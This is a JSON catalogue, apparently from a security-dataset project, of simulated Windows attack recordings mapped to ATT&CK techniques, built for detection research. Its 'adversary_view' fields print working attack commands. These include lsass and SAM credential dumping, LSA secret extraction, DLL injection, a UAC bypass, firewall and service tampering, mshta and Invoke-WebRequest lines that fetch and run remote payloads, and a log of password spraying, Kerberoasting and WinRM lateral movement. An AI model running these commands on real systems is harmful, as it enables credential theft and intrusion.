["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md#atomic-test-3---dump-lsassexe-memory-using-comsvcsdll", "https://twitter.com/shantanukhande/status/1229348874298388484", "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/"]}, "SDWIN-201018225619": {"title": "Lsass Memory Dump via Syscalls", "id": "SDWIN-201018225619", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/18", "modification_date": "2020/10/18", "platform": ["Windows"], "type": "atomic", "tags": ["art.7ae7102c-a099-45c8-b985-4c7a2d05790d"], "description": "This dataset represents adversaries using system calls (syscalls) and API unhooking to dump the memoty contents of lsass.", "attack_mappings": [{"technique": "T1003", "sub-technique": "001", "tactics": ["TA0006"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/cmd_lsass_memory_dumpert_syscalls.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md#atomic-test-4---dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking"}], "permissions_required": ["Administrator"], "adversary_view": "C:\\Users\\wardog\\Desktop>Outflank-Dumpert.exe\n________          __    _____.__                 __\n\\_____  \\  __ ___/  |__/ ____\\  | _____    ____ |  | __\n  /   |   \\|  |  \\   __\\   __\\|  | \\__  \\  /    \\|  |/ /\n/    |    \\  |  /|  |  |  |  |  |__/ __ \\|   |  \\    <\n\\_______  /____/ |__|  |__|  |____(____  /___|  /__|_ \\\n        \\/                             \\/     \\/     \\/\n                                  Dumpert\n                              By Cneeliz @Outflank 2019\n\n[1] Checking OS version details:\n        [+] Operating System is Windows 10 or Server 2016, build number 18363\n        [+] Mapping version specific System calls.\n[2] Checking Process details:\n        [+] Process ID of lsass.exe is: 756\n        [+] NtReadVirtualMemory function pointer at: 0x00007FFB929DC890\n        [+] NtReadVirtualMemory System call nr is: 0x3f\n        [+] Unhooking NtReadVirtualMemory.\n[3] Create memorydump file:\n        [+] Open a process handle.\n        [+] Dump lsass.exe memory to: \\??\\C:\\windows\\Temp\\dumpert.dmp\n        [+] Dump succesful.\n\nC:\\Users\\wardog\\Desktop>"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md#atomic-test-4---dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking", "https://github.com/outflanknl/Dumpert", "https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/"]}, "SDWIN-201019002900": {"title": "SAM Copy via Esentutl VSS", "id": "SDWIN-201019002900", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/19", "modification_date": "2020/10/19", "platform": ["Windows"], "type": "atomic", "tags": ["art.a90c2f4d-6726-444e-99d2-a00cd7c20480"], "description": "This dataset represents adversaries copying the SAM hive using the esentutl.exe utility and volume shadow copy services.", "attack_mappings": [{"technique": "T1003", "sub-technique": "002", "tactics": ["TA0006"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/cmd_sam_copy_esentutl.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy"}], "permissions_required": ["Administrator"], "adversary_view": "Microsoft Windows [Version 10.0.18363.1139]\n(c) 2019 Microsoft Corporation. All rights reserved.\n\nC:\\Users\\wardog>esentutl.exe /y /vss %SystemRoot%/system32/config/SAM /d C:\\ProgramData\\SAM\n\nExtensible Storage Engine Utilities for Microsoft(R) Windows(R)\nVersion 10.0\nCopyright (C) Microsoft Corporation. All Rights Reserved.\n\nInitializing VSS subsystem...\n\nInitiating COPY FILE mode...\n    Source File: \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\System32\nDestination File: C:\\ProgramData\\SAM\n\n                      Copy Progress (% complete)\n\n          0    10   20   30   40   50   60   70   80   90  100\n          |----|----|----|----|----|----|----|----|----|----|\n          ...................................................\n\n        Total bytes read                = 0x9000 (36864) (0 MB)\n        Total bytes written             = 0x9000 (36864) (0 MB)\n\n\nOperation completed successfully in 4.859 seconds.\n\nC:\\Users\\wardog>"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy"]}, "SDWIN-201019033054": {"title": "Psexec Reg LSA Secrets Dump", "id": "SDWIN-201019033054", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/19", "modification_date": "2020/10/19", "platform": ["Windows"], "type": "atomic", "tags": ["art.55295ab0-a703-433b-9ca4-ae13807de12f"], "description": "This dataset represents adversaries using psexec to run reg.exe as system and dump LSA secrets. Location HKLM\\security\\policy\\secrets.", "attack_mappings": [{"technique": "T1003", "sub-technique": "004", "tactics": ["TA0006"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/cmd_psexec_lsa_secrets_dump.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md#atomic-test-1---dumping-lsa-secrets"}], "permissions_required": ["Administrator"], "adversary_view": "C:\\Users\\wardog\\Downloads\\PSTools>PsExec.exe -accepteula -s reg save HKLM\\security\\policy\\secrets %temp%\\secrets\n\nPsExec v2.2 - Execute processes remotely\nCopyright (C) 2001-2016 Mark Russinovich\nSysinternals - www.sysinternals.com\n\n\nThe operation completed successfully.\nreg exited on WORKSTATION5 with error code 0.\n\nC:\\Users\\wardog\\Downloads\\PSTools>"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md#atomic-test-1---dumping-lsa-secrets"]}, "SDWIN-201019224718": {"title": "Logon Scripts via UserInitMprLogonScript", "id": "SDWIN-201019224718", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/19", "modification_date": "2020/10/19", "platform": ["Windows"], "type": "atomic", "tags": ["art.d6042746-07d4-4c92-9ad8-e644c114a231"], "description": "This dataset represents adversaries leveraging logon initialization scripts to achieve persistence via the UserInitMprLogonScript user environment.", "attack_mappings": [{"technique": "T1037", "sub-technique": "001", "tactics": ["TA0003"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/cmd_userinitmprlogonscript_batch.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}], "permissions_required": ["Administrator"], "adversary_view": "Microsoft Windows [Version 10.0.18363.1139]\n(c) 2019 Microsoft Corporation. All rights reserved.\n\nC:\\Users\\wardog>echo \"echo Art Logon Script atomic test was successful. >> %USERPROFILE%\\desktop\\T1037.001-log.txt\" > %temp%\\art.bat\n\nC:\\Users\\wardog>REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_SZ /d %temp%\\art.bat /f\nThe operation completed successfully."}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"]}, "SDWIN-201019232515": {"title": "Mavinject Process DLL Injection", "id": "SDWIN-201019232515", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/19", "modification_date": "2020/10/19", "platform": ["Windows"], "type": "atomic", "tags": ["art.74496461-11a1-4982-b439-4d87a550d254"], "description": "This dataset represents adversaries leveraging", "attack_mappings": [{"technique": "T1055", "sub-technique": null, "tactics": ["TA0004", "TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_mavinject_dll_notepad.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "powershell", "module": "powershell", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md#atomic-test-1---process-injection-via-mavinjectexe"}], "permissions_required": ["Administrator"], "adversary_view": "PS C:\\Users\\wardog> Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll\" -OutFile C:\\ProgramData\\T1055.dll\nPS C:\\Users\\wardog> $mypid = (Start-Process notepad -PassThru).id\nPS C:\\Users\\wardog> mavinject $mypid /INJECTRUNNING C:\\ProgramData\\T1055.dll"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md#atomic-test-1---process-injection-via-mavinjectexe"]}, "SDWIN-201020013208": {"title": "UI Prompt For Credentials Function", "id": "SDWIN-201020013208", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/20", "modification_date": "2020/10/20", "platform": ["Windows"], "type": "atomic", "tags": ["art.2b162bfd-0928-4d4c-9ec3-4d9f88374b52"], "description": "This dataset represents adversaries leveraging functions such as CredUIPromptForCredentials to create and display a configurable dialog box that accepts credentials information from a user.", "attack_mappings": [{"technique": "T1056", "sub-technique": "002", "tactics": ["TA0006", "TA0009"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/psh_input_capture_promptforcreds.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "powershell", "module": "powershell", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password"}], "permissions_required": ["Administrator"], "adversary_view": "PS > $cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName)\nPS > write-warning $cred.GetNetworkCredential().Password\nWARNING: testing\nPS >"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password", "https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa"]}, "SDWIN-201021001911": {"title": "Netsh Open FW Proxy Ports", "id": "SDWIN-201021001911", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/21", "modification_date": "2020/10/21", "platform": ["Windows"], "type": "atomic", "tags": ["art.15e57006-79dd-46df-9bf9-31bc24fb5a80"], "description": "This dataset represents adversaries modifying the local FW by opening port for proxy.", "attack_mappings": [{"technique": "T1562", "sub-technique": "004", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_netsh_fw_mod_open_ports.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "cmd", "module": "cmd", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-4---opening-ports-for-proxy---hardrain"}], "permissions_required": ["Administrator"], "adversary_view": "netsh advfirewall firewall add rule name=\"atomic testing\" action=allow dir=in protocol=TCP localport=450\nnetsh advfirewall firewall delete rule name=\"atomic testing\" protocol=TCP localport=450 >nul 2>&1"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-4---opening-ports-for-proxy---hardrain"]}, "SDWIN-201021204544": {"title": "Service Modification Fax", "id": "SDWIN-201021204544", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/21", "modification_date": "2020/10/21", "platform": ["Windows"], "type": "atomic", "tags": ["art.ed366cde-7d12-49df-a833-671904770b9f"], "description": "This dataset represents adversaries modifying a local service to execute powershell.", "attack_mappings": [{"technique": "T1543", "sub-technique": "003", "tactics": ["TA0003", "TA0004"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/privilege_escalation/host/cmd_service_mod_fax.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "cmd", "module": "cmd", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md#atomic-test-1---modify-fax-service-to-run-powershell"}], "permissions_required": ["Administrator"], "adversary_view": "sc config Fax binPath= \"C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -c \\\"write-host 'T1543.003 Test'\\\"\"\nsc start Fax"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md#atomic-test-1---modify-fax-service-to-run-powershell"]}, "SDWIN-201021232814": {"title": "Internet Explorer Version Discovery", "id": "SDWIN-201021232814", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/21", "modification_date": "2020/10/21", "platform": ["Windows"], "type": "atomic", "tags": ["art.68981660-6670-47ee-a5fa-7e74806420a4"], "description": "This dataset represents threat actors querying HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer to get the version of internet explorer installed on the system.", "attack_mappings": [{"technique": "T1518", "sub-technique": null, "tactics": ["TA0007"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/cmd_discover_iexplorer_version_registry.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "cmd", "module": "cmd", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md#atomic-test-1---find-and-display-internet-explorer-browser-version"}], "permissions_required": ["Administrator"], "adversary_view": "reg query \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\" /v svcVersion"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md#atomic-test-1---find-and-display-internet-explorer-browser-version"]}, "SDWIN-201022002145": {"title": "HH Execution of Local Compiled HTML Payload", "id": "SDWIN-201022002145", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/22", "modification_date": "2020/10/22", "platform": ["Windows"], "type": "atomic", "tags": ["art.5cb87818-0d7c-4469-b7ef-9224107aebe8"], "description": "This dataset represents threat actors executing local compiled HTML Help payloads via hh.exe.", "attack_mappings": [{"technique": "T1218", "sub-technique": "001", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_hh_local_html_payload.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "powershell", "module": "powershell", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md#atomic-test-1---compiled-html-help-local-payload"}], "permissions_required": ["Administrator"], "adversary_view": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm\" -OutFile C:\\ProgramData\\T1218.001.chm\nhh.exe C:\\ProgramData\\T1218.001.chm"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md#atomic-test-1---compiled-html-help-local-payload"]}, "SDWIN-201022013121": {"title": "Control Panel Execution", "id": "SDWIN-201022013121", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/22", "modification_date": "2020/10/22", "platform": ["Windows"], "type": "atomic", "tags": ["art.037e9d8a-9e46-4255-8b33-2ae3b545ca6f"], "description": "This dataset represents threat actors leveraging control.exe to execute a .cpl file to proxy execute another payload (i.e. calc).", "attack_mappings": [{"technique": "T1218", "sub-technique": "002", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_control_panel_execution.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "powershell", "module": "powershell", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md#atomic-test-1---control-panel-items"}], "permissions_required": ["Administrator"], "adversary_view": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.002/bin/calc.cpl\" -OutFile C:\\ProgramData\\calc.cpl\ncontrol.exe C:\\ProgramData\\calc.cpl"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md#atomic-test-1---control-panel-items"]}, "SDWIN-201022015432": {"title": "CMSTP Proxy Execution", "id": "SDWIN-201022015432", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/22", "modification_date": "2020/10/22", "platform": ["Windows"], "type": "atomic", "tags": ["art.748cb4f6-2fb3-4e97-b7ad-b22635a09ab0"], "description": "This dataset represents threat actors leveraging CMSTP to execute an Inf file to proxy execute other malicious commands (i.e. cmd.exe). (Embedding commands in the RunPreSetupCommandsSection of the INF file).", "attack_mappings": [{"technique": "T1218", "sub-technique": "003", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_cmstp_execution_bypassuac.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "powershell", "module": "powershell", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md#atomic-test-2---cmstp-executing-uac-bypass"}], "permissions_required": ["User"], "adversary_view": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf\" -OutFile C:\\ProgramData\\T1218.003_uacbypass.inf\ncmstp.exe /s C:\\ProgramData\\T1218.003_uacbypass.inf /au"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md#atomic-test-2---cmstp-executing-uac-bypass"]}, "SDWIN-201022022144": {"title": "Mshta Javascript GetObject Sct", "id": "SDWIN-201022022144", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/22", "modification_date": "2020/10/22", "platform": ["Windows"], "type": "atomic", "tags": ["art.1483fab9-4f52-4217-a9ce-daa9d7747cae"], "description": "This dataset represents threat actors leveraging mshta.exe to proxy execute malicious .sct files via Javascript.", "attack_mappings": [{"technique": "T1218", "sub-technique": "005", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_mshta_javascript_getobject_sct.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md#atomic-test-1---mshta-executes-javascript-scheme-fetch-remote-payload-with-getobject"}], "permissions_required": ["Administrator"], "adversary_view": "mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md#atomic-test-1---mshta-executes-javascript-scheme-fetch-remote-payload-with-getobject"]}, "SDWIN-201022025808": {"title": "Mshta VBScript Execute PowerShell", "id": "SDWIN-201022025808", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/22", "modification_date": "2020/10/22", "platform": ["Windows"], "type": "atomic", "tags": ["art.906865c3-e05f-4acc-85c4-fbc185455095"], "description": "This dataset represents threat actors leveraging mshta.exe to proxy execute malicious powershell commands via vbscript.", "attack_mappings": [{"technique": "T1218", "sub-technique": "005", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_mshta_vbscript_execute_psh.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md#atomic-test-2---mshta-executes-vbscript-to-execute-malicious-command"}], "permissions_required": ["Administrator"], "adversary_view": "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell -noexit -command Get-Service sysmon\"\":close\")"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md#atomic-test-2---mshta-executes-vbscript-to-execute-malicious-command"]}, "SDWIN-201022035214": {"title": "Mshta HTML Application (HTA) Execution", "id": "SDWIN-201022035214", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/22", "modification_date": "2020/10/22", "platform": ["Windows"], "type": "atomic", "tags": ["art.c4b97eeb-5249-4455-a607-59f95485cb45"], "description": "This dataset represents threat actors leveraging mshta.exe to proxy execute malicious commands via an .hta file.", "attack_mappings": [{"technique": "T1218", "sub-technique": "005", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_mshta_html_application_execution.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "PowerShell", "module": "PowerShell", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md#atomic-test-3---mshta-executes-remote-html-application-hta"}], "permissions_required": ["Administrator"], "adversary_view": "$var =Invoke-WebRequest \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/T1218.005.hta\"\n$var.content|out-file \"$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1218.005.hta\"\nmshta \"$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1218.005.hta\""}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md#atomic-test-3---mshta-executes-remote-html-application-hta"]}, "SDWIN-201022042947": {"title": "PurpleSharp Active Directory Playbook I", "id": "SDWIN-201022042947", "contributors": ["Roberto Rodriguez @Cyb3rWard0g", "Mauricio Velazco @mvelazco"], "creation_date": "2020/10/22", "modification_date": "2020/10/22", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents threat actors performing a few techniques in Active Directory to brute force passwords, request Kerberos ticket-granting service (TGS) service tickets from all SPNs, test access to remote network shares, and move laterally over Windows Remote Management (WinRM).", "attack_mappings": [{"technique": "T1110", "sub-technique": "003", "tactics": ["TA0006"]}, {"technique": "T1558", "sub-technique": "003", "tactics": ["TA0006"]}, {"technique": "T1135", "sub-technique": null, "tactics": ["TA0007"]}, {"technique": "T1021", "sub-technique": "006", "tactics": ["TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/purplesharp_ad_playbook_I.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/purplesharp_ad_playbook_I.zip"}], "simulation": {"environment": "Shire", "tools": [{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": "https://github.com/mvelazc0/PurpleSharp"}], "permissions_required": ["Administrator"], "adversary_view": "c:\\Users\\pgustavo\\Downloads>PurpleSharp.exe /t T1110.003,T1558.003,T1135,T1021.006\n10/22/2020 04:29:52 [*]  Starting T1110.003 Simulation on WORKSTATION5\n10/22/2020 04:29:52 [*]  Simulator running from c:\\Users\\pgustavo\\Downloads\\PurpleSharp.exe with PID:7520 as THESHIRE\\pgustavo\n10/22/2020 04:29:52 [*]  Local Domain Brute Force using the LogonUser Win32 API function\n[*] Targeting domain neighbor users\n[*] Using LogonServer MORDORDC.theshire.local for LDAP queries\n[*] Querying for active domain users with badPwdCount <= 3..\n10/22/2020 04:29:53 [*]  Obtained 7 user accounts\n10/22/2020 04:29:53 [*]  Tried to authenticate as lrodriguez (NTLM). Error Code:1326\n10/22/2020 04:29:53 [*]  Tried to authenticate as pgustavo (NTLM). Error Code:1326\n10/22/2020 04:29:53 [*]  Tried to authenticate as sysmonsvc (NTLM). Error Code:1326\n10/22/2020 04:29:53 [*]  Tried to authenticate as sbeavers (NTLM). Error Code:1326\n10/22/2020 04:29:53 [*]  Tried to authenticate as mscott (NTLM). Error Code:1326\n10/22/2020 04:29:53 [*]  Tried to authenticate as pbeesly (NTLM). Error Code:1326\n10/22/2020 04:29:53 [*]  Tried to authenticate as nxlogsvc (NTLM). Error Code:1326\n10/22/2020 04:29:53 [*]  Simulation Finished\n10/22/2020 04:29:53 [*]  Starting T1558.003 Simulation on WORKSTATION5\n10/22/2020 04:29:53 [*]  Simulator running from c:\\Users\\pgustavo\\Downloads\\PurpleSharp.exe with PID:7520 as THESHIRE\\pgustavo\n10/22/2020 04:29:54 [*]  Obtained service ticket and hash for SPN Sysmon/theshire.local (sysmonsvc)\n10/22/2020 04:29:54 [*]  Obtained service ticket and hash for SPN Nxlog/theshire.local (nxlogsvc)\n10/22/2020 04:29:54 [*]  Obtained service ticket and hash for SPN Defense/theshire.local (defensesvc)\n10/22/2020 04:29:54 [*]  Obtained service ticket and hash for SPN OTR/theshire.local (otrsvc)\n10/22/2020 04:29:54 [*]  Obtained service ticket and hash for SPN Ring/theshire.local (mordorsvc)\n10/22/2020 04:29:54 [*]  Simulation Finished\n10/22/2020 04:29:54 [*]  Starting T1135 Simulation on WORKSTATION5\n10/22/2020 04:29:54 [*]  Simulator running from c:\\Users\\pgustavo\\Downloads\\PurpleSharp.exe with PID:7520 as THESHIRE\\pgustavo\n10/22/2020 04:29:54 [*]  Using the Win32 API NetShareEnum function to execute this technique\n[*] Obtaining domain neighbor targets ...\n[*] Using MORDORDC.theshire.local for LDAP queries\n10/22/2020 04:29:54 [*]  Obtained 4 target computers\n10/22/2020 04:29:54 [*]  Successfully enumerated shares on WEC.theshire.local as THESHIRE\\pgustavo\n10/22/2020 04:29:54 [*]  Successfully enumerated shares on WORKSTATION6.theshire.local as THESHIRE\\pgustavo\n10/22/2020 04:29:54 [*]  Successfully enumerated shares on MORDORDC.theshire.local as THESHIRE\\pgustavo\n10/22/2020 04:29:54 [*]  Successfully enumerated shares on WORKSTATION7.theshire.local as THESHIRE\\pgustavo\n10/22/2020 04:29:54 [*]  Simulation Finished\n10/22/2020 04:29:54 [*]  Starting T1021.006 Simulation on WORKSTATION5\n10/22/2020 04:29:54 [*]  Simulator running from c:\\Users\\pgustavo\\Downloads\\PurpleSharp.exe with PID:7520 as THESHIRE\\pgustavo\n10/22/2020 04:29:54 [*]  Using the System.Management.Automation .NET namespace to execute this technique\n10/22/2020 04:29:54 [*]  Querying LDAP for random targets...\n[*] Obtaining domain neighbor targets ...\n[*] Using MORDORDC.theshire.local for LDAP queries\n10/22/2020 04:29:54 [*]  Obtained 4 target computers\n10/22/2020 04:29:59 [*]  Started a process using WinRM on WORKSTATION7\n10/22/2020 04:30:00 [*]  Started a process using WinRM on WEC\n10/22/2020 04:30:00 [*]  Started a process using WinRM on WORKSTATION6\n10/22/2020 04:30:01 [*]  Started a process using WinRM on MORDORDC\n10/22/2020 04:30:01 [*]  Simulation Finished\n10/22/2020 04:30:01 [*]  Playbook Finished\n\nc:\\Users\\pgustavo\\Downloads>"}, "references": ["https://github.com/mvelazc0/PurpleSharp"]}, "SDWIN-201023020513": {"title": "Register-CimProvider Execute Dll", "id": "SDWIN-201023020513", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/23", "modification_date": "2020/10/23", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents threat actors leveraging Register-Cimprovider to execute a malicious Dll.", "attack_mappings": [{"technique": "T1218", "sub-technique": null, "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_register_cimprovider_execute_dll.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "PowerShell", "module": "PowerShell", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md#atomic-test-3---register-cimprovider---execute-evil-dll"}], "permissions_required": ["Administrator"], "adversary_view": "PS >Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll\" -OutFile C:\\ProgramData\\T1218-2.dll\nPS > C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path C:\\ProgramData\\T1218-2.dll\n\n'Namespace' is not specified.\n'ProviderName' is not specified.\nFailed to load provider 'C:\\ProgramData\\T1218-2.dll'. Failure code 0x8007045A.\n\nTry 'Register-CimProvider.exe -help' for help."}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md#atomic-test-3---register-cimprovider---execute-evil-dll"]}, "SDWIN-201023023651": {"title": "Bitsadmin Download Malicious File", "id": "SDWIN-201023023651", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/23", "modification_date": "2020/10/23", "platform": ["Windows"], "type": "atomic", "tags": ["art.3c73d728-75fb-4180-a12f-6712864d7421"], "description": "This 